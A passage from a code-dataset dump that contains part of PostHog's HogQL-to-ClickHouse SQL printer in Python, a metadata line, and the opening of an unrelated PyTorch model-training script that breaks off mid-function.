visit_not(self, node: ast.Not):\n return f\"not({self.visit(node.expr)})\"\n\n def visit_tuple_access(self, node: ast.TupleAccess):\n visited_tuple = self.visit(node.tuple)\n visited_index = int(str(node.index))\n if isinstance(node.tuple, ast.Field):\n return f\"{visited_tuple}.{visited_index}\"\n\n return f\"({visited_tuple}).{visited_index}\"\n\n def visit_tuple(self, node: ast.Tuple):\n return f\"tuple({', '.join([self.visit(expr) for expr in node.exprs])})\"\n\n def visit_array_access(self, node: ast.ArrayAccess):\n return f\"{self.visit(node.array)}[{self.visit(node.property)}]\"\n\n def visit_array(self, node: ast.Array):\n return f\"[{', '.join([self.visit(expr) for expr in node.exprs])}]\"\n\n def visit_lambda(self, node: ast.Lambda):\n identifiers = [self._print_identifier(arg) for arg in node.args]\n if len(identifiers) == 0:\n raise ValueError(\"Lambdas require at least one argument\")\n elif len(identifiers) == 1:\n return f\"{identifiers[0]} -> {self.visit(node.expr)}\"\n return f\"({', '.join(identifiers)}) -> {self.visit(node.expr)}\"\n\n def visit_order_expr(self, node: ast.OrderExpr):\n return f\"{self.visit(node.expr)} {node.order}\"\n\n def visit_compare_operation(self, node: ast.CompareOperation):\n in_join_constraint = any(isinstance(item, ast.JoinConstraint) for item in self.stack)\n left = self.visit(node.left)\n right = self.visit(node.right)\n nullable_left = self._is_nullable(node.left)\n nullable_right = self._is_nullable(node.right)\n not_nullable = not nullable_left and not nullable_right\n\n # :HACK: until the new type system is out: https://github.com/PostHog/posthog/pull/17267\n # If we add a ifNull() around `events.timestamp`, we lose on the performance of the index.\n if (\"toTimeZone(\" in left and \".timestamp\" in left) or (\"toTimeZone(\" in right and \".timestamp\" in right):\n not_nullable = True\n\n constant_lambda = None\n value_if_one_side_is_null = False\n value_if_both_sides_are_null = False\n\n if node.op == ast.CompareOperationOp.Eq:\n op = 
f\"equals({left}, {right})\"\n constant_lambda = lambda left_op, right_op: left_op == right_op\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotEq:\n op = f\"notEquals({left}, {right})\"\n constant_lambda = lambda left_op, right_op: left_op != right_op\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.Like:\n op = f\"like({left}, {right})\"\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotLike:\n op = f\"notLike({left}, {right})\"\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.ILike:\n op = f\"ilike({left}, {right})\"\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotILike:\n op = f\"notILike({left}, {right})\"\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.In:\n op = f\"in({left}, {right})\"\n elif node.op == ast.CompareOperationOp.NotIn:\n op = f\"notIn({left}, {right})\"\n elif node.op == ast.CompareOperationOp.GlobalIn:\n op = f\"globalIn({left}, {right})\"\n elif node.op == ast.CompareOperationOp.GlobalNotIn:\n op = f\"globalNotIn({left}, {right})\"\n elif node.op == ast.CompareOperationOp.Regex:\n op = f\"match({left}, {right})\"\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotRegex:\n op = f\"not(match({left}, {right}))\"\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.IRegex:\n op = f\"match({left}, concat('(?i)', {right}))\"\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotIRegex:\n op = f\"not(match({left}, concat('(?i)', {right})))\"\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.Gt:\n op = f\"greater({left}, {right})\"\n constant_lambda = (\n lambda left_op, right_op: left_op > right_op if left_op is not None and right_op is not None else False\n )\n elif node.op == ast.CompareOperationOp.GtEq:\n op = f\"greaterOrEquals({left}, {right})\"\n constant_lambda = (\n lambda left_op, right_op: left_op >= right_op if left_op is not None and right_op is not None else False\n )\n elif node.op == ast.CompareOperationOp.Lt:\n op = f\"less({left}, {right})\"\n constant_lambda = (\n lambda left_op, right_op: left_op < right_op if left_op is not None and right_op is not None else False\n )\n elif node.op == ast.CompareOperationOp.LtEq:\n op = f\"lessOrEquals({left}, {right})\"\n constant_lambda = (\n lambda left_op, right_op: left_op <= right_op if left_op is not None and right_op is not None else False\n )\n else:\n raise HogQLException(f\"Unknown CompareOperationOp: {node.op.name}\")\n\n # Try to see if we can take shortcuts\n\n # Can we compare constants?\n if isinstance(node.left, ast.Constant) and isinstance(node.right, ast.Constant) and constant_lambda is not None:\n return \"1\" if constant_lambda(node.left.value, node.right.value) else \"0\"\n\n # Special cases when we should not add any null checks\n if in_join_constraint or self.dialect == \"hogql\" or not_nullable:\n return op\n\n # Special optimization for \"Eq\" operator\n if (\n node.op == ast.CompareOperationOp.Eq\n or node.op == ast.CompareOperationOp.Like\n or node.op == ast.CompareOperationOp.ILike\n ):\n if isinstance(node.right, ast.Constant):\n if node.right.value is None:\n return f\"isNull({left})\"\n return f\"ifNull({op}, 0)\"\n elif isinstance(node.left, ast.Constant):\n if node.left.value is None:\n return f\"isNull({right})\"\n return f\"ifNull({op}, 0)\"\n return f\"ifNull({op}, isNull({left}) and 
isNull({right}))\" # Worse case performance, but accurate\n\n # Special optimization for \"NotEq\" operator\n if (\n node.op == ast.CompareOperationOp.NotEq\n or node.op == ast.CompareOperationOp.NotLike\n or node.op == ast.CompareOperationOp.NotILike\n ):\n if isinstance(node.right, ast.Constant):\n if node.right.value is None:\n return f\"isNotNull({left})\"\n return f\"ifNull({op}, 1)\"\n elif isinstance(node.left, ast.Constant):\n if node.left.value is None:\n return f\"isNotNull({right})\"\n return f\"ifNull({op}, 1)\"\n return f\"ifNull({op}, isNotNull({left}) or isNotNull({right}))\" # Worse case performance, but accurate\n\n # Return false if one, but only one of the two sides is a null constant\n if isinstance(node.right, ast.Constant) and node.right.value is None:\n # Both are a constant null\n if isinstance(node.left, ast.Constant) and node.left.value is None:\n return \"1\" if value_if_both_sides_are_null is True else \"0\"\n\n # Only the right side is null. Return a value only if the left side doesn't matter.\n if value_if_both_sides_are_null == value_if_one_side_is_null:\n return \"1\" if value_if_one_side_is_null is True else \"0\"\n elif isinstance(node.left, ast.Constant) and node.left.value is None:\n # Only the left side is null. Return a value only if the right side doesn't matter.\n if value_if_both_sides_are_null == value_if_one_side_is_null:\n return \"1\" if value_if_one_side_is_null is True else \"0\"\n\n # \"in\" and \"not in\" return 0/1 when the right operator is null, so optimize if the left operand is not nullable\n if node.op == ast.CompareOperationOp.In or node.op == ast.CompareOperationOp.NotIn:\n if not nullable_left or (isinstance(node.left, ast.Constant) and node.left.value is not None):\n return op\n\n # No constants, so check for nulls in SQL\n if value_if_one_side_is_null is True and value_if_both_sides_are_null is True:\n return f\"ifNull({op}, 1)\"\n elif value_if_one_side_is_null is True and value_if_both_sides_are_null is False:\n return f\"ifNull({op}, isNotNull({left}) or isNotNull({right}))\"\n elif value_if_one_side_is_null is False and value_if_both_sides_are_null is True:\n return f\"ifNull({op}, isNull({left}) and isNull({right}))\" # Worse case performance, but accurate\n elif value_if_one_side_is_null is False and value_if_both_sides_are_null is False:\n return f\"ifNull({op}, 0)\"\n else:\n raise HogQLException(\"Impossible\")\n\n def visit_constant(self, node: ast.Constant):\n if self.dialect == \"hogql\":\n # Inline everything in HogQL\n return self._print_escaped_string(node.value)\n elif (\n node.value is None\n or isinstance(node.value, bool)\n or isinstance(node.value, int)\n or isinstance(node.value, float)\n or isinstance(node.value, UUID)\n or isinstance(node.value, UUIDT)\n or isinstance(node.value, datetime)\n or isinstance(node.value, date)\n ):\n # Inline some permitted types in ClickHouse\n value = self._print_escaped_string(node.value)\n if \"%\" in value:\n # We don't know if this will be passed on as part of a legacy ClickHouse query or not.\n # Ban % to be on the safe side. 
Who knows how it can end up in a UUID or datetime for example.\n raise HogQLException(f\"Invalid character '%' in constant: {value}\")\n return value\n else:\n # Strings, lists, tuples, and any other random datatype printed in ClickHouse.\n return self.context.add_value(node.value)\n\n def visit_field(self, node: ast.Field):\n if node.type is None:\n field = \".\".join([self._print_hogql_identifier_or_index(identifier) for identifier in node.chain])\n raise HogQLException(f\"Field {field} has no type\")\n\n if self.dialect == \"hogql\":\n if node.chain == [\"*\"]:\n return \"*\"\n # When printing HogQL, we print the properties out as a chain as they are.\n return \".\".join([self._print_hogql_identifier_or_index(identifier) for identifier in node.chain])\n\n if node.type is not None:\n if isinstance(node.type, ast.LazyJoinType) or isinstance(node.type, ast.VirtualTableType):\n raise HogQLException(f\"Can't select a table when a column is expected: {'.'.join(node.chain)}\")\n\n return self.visit(node.type)\n else:\n raise HogQLException(f\"Unknown Type, can not print {type(node.type).__name__}\")\n\n def visit_call(self, node: ast.Call):\n if node.name in HOGQL_COMPARISON_MAPPING:\n op = HOGQL_COMPARISON_MAPPING[node.name]\n if len(node.args) != 2:\n raise HogQLException(f\"Comparison '{node.name}' requires exactly two arguments\")\n # We do \"cleverer\" logic with nullable types in visit_compare_operation\n return self.visit_compare_operation(\n ast.CompareOperation(\n left=node.args[0],\n right=node.args[1],\n op=op,\n )\n )\n elif node.name in HOGQL_AGGREGATIONS:\n func_meta = HOGQL_AGGREGATIONS[node.name]\n\n validate_function_args(\n node.args,\n func_meta.min_args,\n func_meta.max_args,\n node.name,\n function_term=\"aggregation\",\n )\n if func_meta.min_params:\n if node.params is None:\n raise HogQLException(f\"Aggregation '{node.name}' requires parameters in addition to arguments\")\n validate_function_args(\n node.params,\n func_meta.min_params,\n func_meta.max_params,\n node.name,\n function_term=\"aggregation\",\n argument_term=\"parameter\",\n )\n\n # check that we're not running inside another aggregate\n for stack_node in self.stack:\n if stack_node != node and isinstance(stack_node, ast.Call) and stack_node.name in HOGQL_AGGREGATIONS:\n raise HogQLException(\n f\"Aggregation '{node.name}' cannot be nested inside another aggregation '{stack_node.name}'.\"\n )\n\n args = [self.visit(arg) for arg in node.args]\n params = [self.visit(param) for param in node.params] if node.params is not None else None\n\n params_part = f\"({', '.join(params)})\" if params is not None else \"\"\n args_part = f\"({f'DISTINCT ' if node.distinct else ''}{', '.join(args)})\"\n return f\"{func_meta.clickhouse_name}{params_part}{args_part}\"\n\n elif node.name in HOGQL_CLICKHOUSE_FUNCTIONS:\n func_meta = HOGQL_CLICKHOUSE_FUNCTIONS[node.name]\n\n validate_function_args(node.args, func_meta.min_args, func_meta.max_args, node.name)\n if func_meta.min_params:\n if node.params is None:\n raise HogQLException(f\"Function '{node.name}' requires parameters in addition to arguments\")\n validate_function_args(\n node.params,\n func_meta.min_params,\n func_meta.max_params,\n node.name,\n argument_term=\"parameter\",\n )\n\n if self.dialect == \"clickhouse\":\n if node.name in FIRST_ARG_DATETIME_FUNCTIONS:\n args: List[str] = []\n for idx, arg in enumerate(node.args):\n if idx == 0:\n if isinstance(arg, ast.Call) and arg.name in ADD_OR_NULL_DATETIME_FUNCTIONS:\n 
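# Calls that may return a NULL datetime get assumeNotNull() instead of a forced timezone cast.\n                                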
args.append(f\"assumeNotNull(toDateTime({self.visit(arg)}))\")\n else:\n args.append(f\"toDateTime({self.visit(arg)}, 'UTC')\")\n else:\n args.append(self.visit(arg))\n elif node.name == \"concat\":\n args: List[str] = []\n for arg in node.args:\n if isinstance(arg, ast.Constant):\n if arg.value is None:\n args.append(\"''\")\n elif isinstance(arg.value, str):\n args.append(self.visit(arg))\n else:\n args.append(f\"toString({self.visit(arg)})\")\n elif isinstance(arg, ast.Call) and arg.name == \"toString\":\n if len(arg.args) == 1 and isinstance(arg.args[0], ast.Constant):\n if arg.args[0].value is None:\n args.append(\"''\")\n else:\n args.append(self.visit(arg))\n else:\n args.append(f\"ifNull({self.visit(arg)}, '')\")\n else:\n args.append(f\"ifNull(toString({self.visit(arg)}), '')\")\n else:\n args = [self.visit(arg) for arg in node.args]\n\n relevant_clickhouse_name = func_meta.clickhouse_name\n if func_meta.overloads:\n first_arg_constant_type = (\n node.args[0].type.resolve_constant_type()\n if len(node.args) > 0 and node.args[0].type is not None\n else None\n )\n\n if first_arg_constant_type is not None:\n for (\n overload_types,\n overload_clickhouse_name,\n ) in func_meta.overloads:\n if isinstance(first_arg_constant_type, overload_types):\n relevant_clickhouse_name = overload_clickhouse_name\n break # Found an overload matching the first function org\n\n if func_meta.tz_aware:\n if (relevant_clickhouse_name == \"now64\" and len(node.args) == 0) or (\n relevant_clickhouse_name == \"parseDateTime64BestEffortOrNull\" and len(node.args) == 1\n ):\n args.append(\"6\") # These two CH functions require the precision argument before timezone\n args.append(self.visit(ast.Constant(value=self._get_timezone())))\n if node.name == \"toStartOfWeek\" and len(node.args) == 1:\n # If week mode hasn't been specified, use the project's default.\n # For Monday-based weeks mode 3 is used (which is ISO 8601), for Sunday-based mode 0 (CH default)\n args.insert(1, WeekStartDay(self._get_week_start_day()).clickhouse_mode)\n\n params = [self.visit(param) for param in node.params] if node.params is not None else None\n\n params_part = f\"({', '.join(params)})\" if params is not None else \"\"\n args_part = f\"({', '.join(args)})\"\n return f\"{relevant_clickhouse_name}{params_part}{args_part}\"\n else:\n return f\"{node.name}({', '.join([self.visit(arg) for arg in node.args])})\"\n elif node.name in HOGQL_POSTHOG_FUNCTIONS:\n func_meta = HOGQL_POSTHOG_FUNCTIONS[node.name]\n validate_function_args(node.args, func_meta.min_args, func_meta.max_args, node.name)\n args = [self.visit(arg) for arg in node.args]\n\n if self.dialect in (\"hogql\", \"clickhouse\"):\n if node.name == \"hogql_lookupDomainType\":\n return f\"dictGetOrNull('channel_definition_dict', 'domain_type', (cutToFirstSignificantSubdomain(coalesce({args[0]}, '')), 'source'))\"\n elif node.name == \"hogql_lookupPaidDomainType\":\n return f\"dictGetOrNull('channel_definition_dict', 'type_if_paid', (cutToFirstSignificantSubdomain(coalesce({args[0]}, '')), 'source'))\"\n elif node.name == \"hogql_lookupPaidSourceType\":\n return (\n f\"dictGetOrNull('channel_definition_dict', 'type_if_paid', (coalesce({args[0]}, ''), 'source'))\"\n )\n elif node.name == \"hogql_lookupPaidMediumType\":\n return (\n f\"dictGetOrNull('channel_definition_dict', 'type_if_paid', (coalesce({args[0]}, ''), 'medium'))\"\n )\n elif node.name == \"hogql_lookupOrganicDomainType\":\n return f\"dictGetOrNull('channel_definition_dict', 'type_if_organic', 
(cutToFirstSignificantSubdomain(coalesce({args[0]}, '')), 'source'))\"\n elif node.name == \"hogql_lookupOrganicSourceType\":\n return f\"dictGetOrNull('channel_definition_dict', 'type_if_organic', (coalesce({args[0]}, ''), 'source'))\"\n elif node.name == \"hogql_lookupOrganicMediumType\":\n return f\"dictGetOrNull('channel_definition_dict', 'type_if_organic', (coalesce({args[0]}, ''), 'medium'))\"\n raise HogQLException(f\"Unexpected unresolved HogQL function '{node.name}(...)'\")\n else:\n close_matches = get_close_matches(node.name, ALL_EXPOSED_FUNCTION_NAMES, 1)\n if len(close_matches) > 0:\n raise HogQLException(\n f\"Unsupported function call '{node.name}(...)'. Perhaps you meant '{close_matches[0]}(...)'?\"\n )\n raise HogQLException(f\"Unsupported function call '{node.name}(...)'\")\n\n def visit_placeholder(self, node: ast.Placeholder):\n raise HogQLException(f\"Placeholders, such as {{{node.field}}}, are not supported in this context\")\n\n def visit_alias(self, node: ast.Alias):\n # Skip hidden aliases completely.\n if node.hidden:\n return self.visit(node.expr)\n expr = node.expr\n while isinstance(expr, ast.Alias) and expr.hidden:\n expr = expr.expr\n inside = self.visit(expr)\n if isinstance(expr, ast.Alias):\n inside = f\"({inside})\"\n alias = self._print_identifier(node.alias)\n return f\"{inside} AS {alias}\"\n\n def visit_table_type(self, type: ast.TableType):\n if self.dialect == \"clickhouse\":\n return type.table.to_printed_clickhouse(self.context)\n else:\n return type.table.to_printed_hogql()\n\n def visit_table_alias_type(self, type: ast.TableAliasType):\n return self._print_identifier(type.alias)\n\n def visit_lambda_argument_type(self, type: ast.LambdaArgumentType):\n return self._print_identifier(type.name)\n\n def visit_field_type(self, type: ast.FieldType):\n try:\n last_select = self._last_select()\n type_with_name_in_scope = lookup_field_by_name(last_select.type, type.name) if last_select else None\n except ResolverException:\n type_with_name_in_scope = None\n\n if (\n isinstance(type.table_type, ast.TableType)\n or isinstance(type.table_type, ast.TableAliasType)\n or isinstance(type.table_type, ast.VirtualTableType)\n ):\n resolved_field = type.resolve_database_field()\n if resolved_field is None:\n raise HogQLException(f'Can\\'t resolve field \"{type.name}\" on table.')\n if isinstance(resolved_field, Table):\n if isinstance(type.table_type, ast.VirtualTableType):\n return self.visit(ast.AsteriskType(table_type=ast.TableType(table=resolved_field)))\n else:\n return self.visit(\n ast.AsteriskType(\n table_type=ast.TableAliasType(\n table_type=ast.TableType(table=resolved_field),\n alias=type.table_type.alias,\n )\n )\n )\n\n # :KLUDGE: Legacy person properties handling. Only used within non-HogQL queries, such as insights.\n if (\n self.context.within_non_hogql_query\n and isinstance(type.table_type, ast.VirtualTableType)\n and type.name == \"properties\"\n and type.table_type.field == \"poe\"\n ):\n if self.context.modifiers.personsOnEventsMode != PersonOnEventsMode.DISABLED:\n field_sql = \"person_properties\"\n else:\n field_sql = \"person_props\"\n else:\n # this errors because resolved_field is of type ast.Alias and not a field - what's the best way to solve?\n field_sql = self._print_identifier(resolved_field.name)\n if self.context.within_non_hogql_query and type_with_name_in_scope == type:\n # Do not prepend table name in non-hogql context. 
We don't know what it actually is.\n return field_sql\n field_sql = f\"{self.visit(type.table_type)}.{field_sql}\"\n\n elif (\n isinstance(type.table_type, ast.SelectQueryType)\n or isinstance(type.table_type, ast.SelectQueryAliasType)\n or isinstance(type.table_type, ast.SelectUnionQueryType)\n ):\n field_sql = self._print_identifier(type.name)\n if isinstance(type.table_type, ast.SelectQueryAliasType):\n field_sql = f\"{self.visit(type.table_type)}.{field_sql}\"\n\n # :KLUDGE: Legacy person properties handling. Only used within non-HogQL queries, such as insights.\n if self.context.within_non_hogql_query and field_sql == \"events__pdi__person.properties\":\n if self.context.modifiers.personsOnEventsMode != PersonOnEventsMode.DISABLED:\n field_sql = \"person_properties\"\n else:\n field_sql = \"person_props\"\n\n else:\n error = f\"Can't access field '{type.name}' on a table with type '{type.table_type.__class__.__name__}'.\"\n if isinstance(type.table_type, ast.LazyJoinType):\n error += f\" Lazy joins should have all been replaced in the resolver.\"\n raise HogQLException(error)\n\n return field_sql\n\n def visit_property_type(self, type: ast.PropertyType):\n if type.joined_subquery is not None and type.joined_subquery_field_name is not None:\n return f\"{self._print_identifier(type.joined_subquery.alias)}.{self._print_identifier(type.joined_subquery_field_name)}\"\n\n field_type = type.field_type\n field = field_type.resolve_database_field()\n\n # check for a materialised column\n table = field_type.table_type\n while isinstance(table, ast.TableAliasType):\n table = table.table_type\n\n args: List[str] = []\n\n if self.context.modifiers.materializationMode != \"disabled\":\n # find a materialized property for the first part of the chain\n materialized_property_sql: Optional[str] = None\n if isinstance(table, ast.TableType):\n if self.dialect == \"clickhouse\":\n table_name = table.table.to_printed_clickhouse(self.context)\n else:\n table_name = table.table.to_printed_hogql()\n if field is None:\n raise HogQLException(f\"Can't resolve field {field_type.name} on table {table_name}\")\n field_name = cast(Union[Literal[\"properties\"], Literal[\"person_properties\"]], field.name)\n\n materialized_column = self._get_materialized_column(table_name, type.chain[0], field_name)\n if materialized_column:\n property_sql = self._print_identifier(materialized_column)\n property_sql = f\"{self.visit(field_type.table_type)}.{property_sql}\"\n materialized_property_sql = property_sql\n elif (\n self.context.within_non_hogql_query\n and (isinstance(table, ast.SelectQueryAliasType) and table.alias == \"events__pdi__person\")\n or (isinstance(table, ast.VirtualTableType) and table.field == \"poe\")\n ):\n # :KLUDGE: Legacy person properties handling. 
Only used within non-HogQL queries, such as insights.\n if self.context.modifiers.personsOnEventsMode != PersonOnEventsMode.DISABLED:\n materialized_column = self._get_materialized_column(\"events\", type.chain[0], \"person_properties\")\n else:\n materialized_column = self._get_materialized_column(\"person\", type.chain[0], \"properties\")\n if materialized_column:\n materialized_property_sql = self._print_identifier(materialized_column)\n\n if materialized_property_sql is not None:\n # TODO: rematerialize all columns to properly support empty strings and \"null\" string values.\n if self.context.modifiers.materializationMode == MaterializationMode.legacy_null_as_string:\n materialized_property_sql = f\"nullIf({materialized_property_sql}, '')\"\n else: # MaterializationMode.auto.legacy_null_as_null\n materialized_property_sql = f\"nullIf(nullIf({materialized_property_sql}, ''), 'null')\"\n\n if len(type.chain) == 1:\n return materialized_property_sql\n else:\n for name in type.chain[1:]:\n args.append(self.context.add_value(name))\n return self._unsafe_json_extract_trim_quotes(materialized_property_sql, args)\n\n for name in type.chain:\n args.append(self.context.add_value(name))\n return self._unsafe_json_extract_trim_quotes(self.visit(field_type), args)\n\n def visit_sample_expr(self, node: ast.SampleExpr):\n sample_value = self.visit_ratio_expr(node.sample_value)\n offset_clause = \"\"\n if node.offset_value:\n offset_value = self.visit_ratio_expr(node.offset_value)\n offset_clause = f\" OFFSET {offset_value}\"\n\n return f\"SAMPLE {sample_value}{offset_clause}\"\n\n def visit_ratio_expr(self, node: ast.RatioExpr):\n return self.visit(node.left) if node.right is None else f\"{self.visit(node.left)}/{self.visit(node.right)}\"\n\n def visit_select_query_alias_type(self, type: ast.SelectQueryAliasType):\n return self._print_identifier(type.alias)\n\n def visit_field_alias_type(self, type: ast.FieldAliasType):\n return self._print_identifier(type.alias)\n\n def visit_virtual_table_type(self, type: ast.VirtualTableType):\n return self.visit(type.table_type)\n\n def visit_asterisk_type(self, type: ast.AsteriskType):\n return \"*\"\n\n def visit_lazy_join_type(self, type: ast.LazyJoinType):\n raise HogQLException(\"Unexpected ast.LazyJoinType. Make sure LazyJoinResolver has run on the AST.\")\n\n def visit_lazy_table_type(self, type: ast.LazyJoinType):\n raise HogQLException(\"Unexpected ast.LazyTableType. Make sure LazyJoinResolver has run on the AST.\")\n\n def visit_field_traverser_type(self, type: ast.FieldTraverserType):\n raise HogQLException(\"Unexpected ast.FieldTraverserType. 
This should have been resolved.\")\n\n def visit_unknown(self, node: AST):\n raise HogQLException(f\"Unknown AST node {type(node).__name__}\")\n\n def visit_window_expr(self, node: ast.WindowExpr):\n strings: List[str] = []\n if node.partition_by is not None:\n if len(node.partition_by) == 0:\n raise HogQLException(\"PARTITION BY must have at least one argument\")\n strings.append(\"PARTITION BY\")\n for expr in node.partition_by:\n strings.append(self.visit(expr))\n\n if node.order_by is not None:\n if len(node.order_by) == 0:\n raise HogQLException(\"ORDER BY must have at least one argument\")\n strings.append(\"ORDER BY\")\n for expr in node.order_by:\n strings.append(self.visit(expr))\n\n if node.frame_method is not None:\n if node.frame_method == \"ROWS\":\n strings.append(\"ROWS\")\n elif node.frame_method == \"RANGE\":\n strings.append(\"RANGE\")\n else:\n raise HogQLException(f\"Invalid frame method {node.frame_method}\")\n if node.frame_start and node.frame_end is None:\n strings.append(self.visit(node.frame_start))\n\n elif node.frame_start is not None and node.frame_end is not None:\n strings.append(\"BETWEEN\")\n strings.append(self.visit(node.frame_start))\n strings.append(\"AND\")\n strings.append(self.visit(node.frame_end))\n\n else:\n raise HogQLException(\"Frame start and end must be specified together\")\n return \" \".join(strings)\n\n def visit_window_function(self, node: ast.WindowFunction):\n over = f\"({self.visit(node.over_expr)})\" if node.over_expr else self._print_identifier(node.over_identifier)\n return f\"{self._print_identifier(node.name)}({', '.join(self.visit(expr) for expr in node.args or [])}) OVER {over}\"\n\n def visit_window_frame_expr(self, node: ast.WindowFrameExpr):\n if node.frame_type == \"PRECEDING\":\n return f\"{int(str(node.frame_value)) if node.frame_value is not None else 'UNBOUNDED'} PRECEDING\"\n elif node.frame_type == \"FOLLOWING\":\n return f\"{int(str(node.frame_value)) if node.frame_value is not None else 'UNBOUNDED'} FOLLOWING\"\n elif node.frame_type == \"CURRENT ROW\":\n return \"CURRENT ROW\"\n else:\n raise HogQLException(f\"Invalid frame type {node.frame_type}\")\n\n def _last_select(self) -> Optional[ast.SelectQuery]:\n \"\"\"Find the last SELECT query in the stack.\"\"\"\n for node in reversed(self.stack):\n if isinstance(node, ast.SelectQuery):\n return node\n return None\n\n def _print_identifier(self, name: str) -> str:\n if self.dialect == \"clickhouse\":\n return escape_clickhouse_identifier(name)\n return escape_hogql_identifier(name)\n\n def _print_hogql_identifier_or_index(self, name: str | int) -> str:\n # Regular identifiers can't start with a number. 
Print digit strings as-is for unescaped tuple access.\n if isinstance(name, int) and str(name).isdigit():\n return str(name)\n return escape_hogql_identifier(name)\n\n def _print_escaped_string(self, name: float | int | str | list | tuple | datetime | date) -> str:\n if self.dialect == \"clickhouse\":\n return escape_clickhouse_string(name, timezone=self._get_timezone())\n return escape_hogql_string(name, timezone=self._get_timezone())\n\n def _unsafe_json_extract_trim_quotes(self, unsafe_field: str, unsafe_args: List[str]) -> str:\n return f\"replaceRegexpAll(nullIf(nullIf(JSONExtractRaw({', '.join([unsafe_field] + unsafe_args)}), ''), 'null'), '^\\\"|\\\"$', '')\"\n\n def _get_materialized_column(\n self, table_name: str, property_name: PropertyName, field_name: TableColumn\n ) -> Optional[str]:\n try:\n from ee.clickhouse.materialized_columns.columns import (\n TablesWithMaterializedColumns,\n get_materialized_columns,\n )\n\n materialized_columns = get_materialized_columns(cast(TablesWithMaterializedColumns, table_name))\n return materialized_columns.get((property_name, field_name), None)\n except ModuleNotFoundError:\n return None\n\n def _get_timezone(self) -> str:\n return self.context.database.get_timezone() if self.context.database else \"UTC\"\n\n def _get_week_start_day(self) -> WeekStartDay:\n return self.context.database.get_week_start_day() if self.context.database else WeekStartDay.SUNDAY\n\n def _is_nullable(self, node: ast.Expr) -> bool:\n if isinstance(node, ast.Constant):\n return node.value is None\n elif isinstance(node.type, ast.PropertyType):\n return True\n elif isinstance(node.type, ast.FieldType):\n return node.type.is_nullable()\n elif isinstance(node, ast.Alias):\n return self._is_nullable(node.expr)\n\n # we don't know if it's nullable, so we assume it can be\n return True\n\n def _print_settings(self, settings):\n pairs = []\n for key, value in settings:\n if value is None:\n continue\n if not isinstance(value, (int, float, str)):\n raise HogQLException(f\"Setting {key} must be a string, int, or float\")\n if not re.match(r\"^[a-zA-Z0-9_]+$\", key):\n raise HogQLException(f\"Setting {key} is not supported\")\n if isinstance(value, bool):\n pairs.append(f\"{key}={1 if value else 0}\")\n elif isinstance(value, int) or isinstance(value, float):\n pairs.append(f\"{key}={value}\")\n else:\n pairs.append(f\"{key}={self._print_escaped_string(value)}\")\n if len(pairs) > 0:\n return f\"SETTINGS {', '.join(pairs)}\"\n return None\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/printer.py","file_name":"printer.py","file_ext":"py","file_size_in_byte":57559,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"29354779717","text":"\n\nfrom __future__ import print_function\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nimport torch.optim as optimp\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport copy\nimport torch.optim.lr_scheduler as lr_scheduler\n\n\ndef train_model(model, dataloaders, criterion,learning_rate, num_epochs, is_inception=False):\n since = time.time()\n\n val_acc_history = []\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, betas=(0.9, 0.999), eps=1e-08, weight_decay=0, amsgrad=True)\n scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.1, patience=5, verbose=True, threshold=0.0001, threshold_mode='rel', 
cooldown=0, min_lr=0, eps=1e-08)\n    best_model_wts = copy.deepcopy(model.state_dict())\n    best_acc = 0.0\n\n    for epoch in range(num_epochs):\n        print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n        print('-' * 10)\n\n        # Each epoch has a training and validation phase\n        for phase in ['train', 'valid']:\n            if phase == 'train':\n                model.train()  # Set model to training mode\n            else:\n                model.eval()   # Set model to evaluate mode\n\n            running_loss = 0.0\n            running_corrects = 0\n\n            # Iterate over data.\n            for inputs, labels in dataloaders[phase]:\n                inputs = inputs.to(device)\n                labels = labels.to(device)\n\n                # zero the parameter gradients\n                optimizer.zero_grad()\n\n                # forward\n                # track history only if in train\n                with torch.set_grad_enabled(phase == 'train'):\n                    # Get model outputs and calculate loss\n                    # Special case for inception because in training it has an auxiliary output. In train\n                    # mode we calculate the loss by summing the final output and the auxiliary output\n                    # but in testing we only consider the final output.\n                    if is_inception and phase == 'train':\n                        # From https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958\n                        outputs, aux_outputs = model(inputs)\n                        loss1 = criterion(outputs, labels)\n                        loss2 = criterion(aux_outputs, labels)\n                        loss = loss1 + 0.4*loss2\n                    else:\n                        outputs = model(inputs)\n                        loss = criterion(outputs, labels)\n\n                    _, preds = torch.max(outputs, 1)\n\n                    # backward + optimize only if in training phase\n                    if phase == 'train':\n                        loss.backward()\n                        optimizer.step()\n\n                # statistics\n                running_loss += loss.item() * inputs.size(0)\n                running_corrects += torch.sum(preds == labels.data)\n\n            epoch_loss = running_loss / len(dataloaders[phase].dataset)\n            epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n\n            print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))\n\n            # deep copy the model\n            if phase == 'valid' and epoch_acc > best_acc:\n                best_acc = epoch_acc\n                best_model_wts = copy.deepcopy(model.state_dict())\n            if phase == 'valid':\n                val_acc_history.append(epoch_acc)\n                scheduler.step(epoch_loss)  # drive ReduceLROnPlateau from the validation loss\n\n        print()\n\n    time_elapsed = time.time() - since\n    print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))\n    print('Best val Acc: {:.4f}'.format(best_acc))\n\n    # load best model weights\n    model.load_state_dict(best_model_wts)\n    return model, val_acc_history\n\n\n\n\ndef set_parameter_requires_grad(model, feature_extracting):\n    if feature_extracting:\n        for param in model.parameters():\n            param.requires_grad = 